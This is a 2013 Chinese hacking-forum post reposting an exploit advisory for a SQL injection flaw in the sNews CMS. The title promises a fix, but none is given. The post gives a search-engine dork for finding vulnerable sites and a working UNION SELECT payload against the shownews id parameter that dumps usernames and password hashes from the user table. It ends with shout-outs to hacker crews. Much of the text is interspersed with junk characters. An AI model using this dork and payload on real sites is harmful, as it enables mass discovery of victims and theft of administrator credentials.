找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2012|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability  @5 n! Q# H6 ?% \8 k
作者: By onestree
4 V% d  s' N4 C/ Z" ^0 S4 }9 `下载地址 : http://snewscms.com/. g5 n8 }) G$ R( D$ j
测试平台 : ubuntu 12.10 / win 7) d% F" p/ F- h8 i
关键词: inurl:"tanyakan pada rumput yang bergoyang"
4 J* g. q$ l1 i1 I& [  b / q6 o2 u7 p8 H( t4 g& S
4 C$ s9 ^/ ^  {1 k
*************************************************************0 {  O: Q" t. {3 V, D
- N4 L# B& h" V) ]4 q) e
SQL poc:
  H- g$ q$ G; g: g 1 ~& W$ T  j9 {4 G5 a2 [4 V
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
" X& F- @) V& x& Z, E
0 n8 i, k" _9 ], f2 x" S' D示例% ?. x4 l1 S6 y. `, P
$ A2 R2 J9 _6 |2 X9 L, `
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*/ O* }) T, y$ ~* p2 R9 ?
5 H. h4 |; y2 ^/ n5 f' ]

2 E  C' I+ F6 d; l- v6 W, p; r+ \致谢:
' V) W) F4 i0 [! x6 ?% L * N5 x! L# a% P
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
$ W  g. g/ N' ^  C+ o' t/ i# k     
$ p, Q( w% p5 {          indonesiancoder - moeslimh4x0r - go-coder
! T& E( Q8 N, U6 J " Y5 }* X. Z% d  N$ W
spesial my hunny :*
, m' X, C3 ?# U' q5 ~( M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表